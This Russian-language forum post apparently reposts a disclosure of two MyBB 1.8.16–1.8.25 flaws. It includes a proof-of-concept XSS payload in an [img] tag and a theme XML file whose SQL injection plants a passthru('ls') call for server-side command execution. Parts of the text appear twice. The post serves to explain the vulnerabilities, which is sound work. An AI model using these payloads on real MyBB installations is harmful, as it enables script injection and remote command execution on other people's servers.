В MyBB версий 1.8.16 - 1.8.25 выявлены две уязвимости.
1. Из-за ошибки в преобразователе тегов возможны двойные URL:
Что преобразуется в
2. Возможны SQL-инъекции через шаблоны оформления:
Данный шаблон выполнит
https://blog.sonarsource.com/mybb-remote...tion-chain
1. Из-за ошибки в преобразователе тегов возможны двойные URL:
Код:
[img]http://xyzsomething.com/image?)http://x.com/onerror=alert(1);//[/img]Код:
<img src="http://xyzsomething.com/image?)<a href=" http:="" x.com="" onerror="alert(1);//"" target="_blank" rel="noopener" class="mycode_url">2. Возможны SQL-инъекции через шаблоны оформления:
Код:
<?xml version="1.0" encoding="UTF-8"?>
<theme name="Default" version="1821">
<properties>
<templateset>') AND 1=0 UNION SELECT title, '${passthru(\'ls\')}' from mybb_templates -- </templateset>
</properties>
</theme>ls на сервере.https://blog.sonarsource.com/mybb-remote...tion-chain
It's time to kick gum and chew ass. And i'm all out of ass.
